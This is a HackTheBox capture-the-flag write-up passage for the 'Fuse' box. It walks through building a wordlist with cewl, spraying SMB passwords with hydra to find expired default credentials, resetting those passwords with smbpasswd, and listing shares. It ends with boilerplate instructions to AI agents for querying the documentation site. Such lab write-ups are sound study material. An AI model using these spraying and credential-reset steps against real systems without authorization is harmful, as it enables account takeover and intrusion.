# 5 spray passwd ``` # smb doesn't connect # ldap needs auth # time to cewl $ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt ssh - nothing. $ hydra -L users -P pass.txt smb://10.10.10.193 [DATA] attacking smb://10.10.10.193:445/ [445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon [445][smb] host: 10.10.10.193 login: tlavel password: Fabricorp01 [445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon [445][smb] host: 10.10.10.193 login: bnielson password: Fabricorp01 [445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon [445][smb] host: 10.10.10.193 login: bhult password: Fabricorp01 # trying smbclient $ smbclient -L 10.10.10.193 -U tlavel Enter WORKGROUP\tlavel's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE $ smbclient -L 10.10.10.193 -U bnielson Enter WORKGROUP\bnielson's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE $ smbclient -L 10.10.10.193 -U bhult Enter WORKGROUP\bhult's password: session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE # we need to change password using smbpasswd in kali $ smbpasswd -r 10.10.10.193 -U tlavel Old SMB password: New SMB password: kashz Retype new SMB password: kashz machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria. # there's a password policy that we need to follow # changing to Fabricorp02 $ smbpasswd -r 10.10.10.193 -U bnielson Old SMB password: Fabricorp01 New SMB password: Fabricorp05 Retype new SMB password: Fabricorp05 Password changed for user tlavel $ smbclient -U tlavel -L //10.10.10.193 Enter WORKGROUP\tlavel's password: session setup failed: NT_STATUS_LOGON_FAILURE # trying other users # fails for bhult also | bnielson works $ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share # after every 1-2 min, password is reset and need to change to a different one as using same gives error | machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.. $ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01 Try "help" to get a list of possible commands. smb: \> dir NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* $ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL Try "help" to get a list of possible commands. smb: \> dir . D 0 Fri May 29 16:29:09 2020 .. D 0 Fri May 29 16:29:09 2020 fabricorp.local Dr 0 Fri May 29 16:29:09 2020 smb: \fabricorp.local\> dir . D 0 Fri May 29 16:35:39 2020 .. D 0 Fri May 29 16:35:39 2020 DfsrPrivate DHSr 0 Fri May 29 16:35:39 2020 Policies D 0 Fri May 29 16:29:19 2020 scripts D 0 Fri May 29 16:29:09 2020 # cannot view DfsrPrivate # scripts is empty # Policies contain policy relatd information # nothing in smb ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/fuse/5-spray-passwd.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.